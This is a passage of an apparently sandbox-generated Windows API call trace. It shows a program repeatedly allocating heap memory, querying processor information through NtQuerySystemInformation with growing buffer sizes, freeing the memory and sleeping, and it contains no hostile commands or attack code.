(HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.649] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.672] Sleep (dwMilliseconds=0x110) [0292.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0292.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0292.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0292.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0292.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0292.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0292.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0292.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0292.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.688] Sleep (dwMilliseconds=0x110) [0292.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0292.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0292.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0292.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0292.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0292.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0292.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0292.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0292.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.709] Sleep (dwMilliseconds=0x110) [0292.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0292.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0292.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0292.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0292.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0292.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0292.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0292.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0292.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.722] Sleep (dwMilliseconds=0x110) [0292.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0292.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0292.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0292.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0292.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0292.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0292.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0292.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0292.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.735] Sleep (dwMilliseconds=0x110) [0292.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0292.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0292.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0292.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0292.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0292.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0292.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0292.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0292.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.752] Sleep (dwMilliseconds=0x110) [0292.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0292.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0292.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0292.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0292.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0292.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0292.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0292.772] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.772] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0292.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.773] Sleep (dwMilliseconds=0x110) [0292.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0292.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0292.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0292.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0292.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0292.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0292.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0292.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0292.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.782] Sleep (dwMilliseconds=0x110) [0292.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0292.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0292.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0292.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0292.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0292.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0292.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0292.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0292.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.797] Sleep (dwMilliseconds=0x110) [0292.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0292.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0292.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0292.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0292.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0292.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0292.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0292.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0292.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.817] Sleep (dwMilliseconds=0x110) [0292.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0292.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0292.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0292.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0292.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0292.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0292.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0292.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0292.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.833] Sleep (dwMilliseconds=0x110) [0292.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0292.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0292.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0292.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0292.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0292.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0292.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0292.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0292.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.848] Sleep (dwMilliseconds=0x110) [0292.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0292.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0292.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0292.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0292.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0292.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0292.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0292.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0292.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.864] Sleep (dwMilliseconds=0x110) [0292.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0292.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0292.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0292.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0292.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0292.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0292.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0292.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0292.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.878] Sleep (dwMilliseconds=0x110) [0292.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0292.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0292.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0292.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0292.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0292.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0292.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0292.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 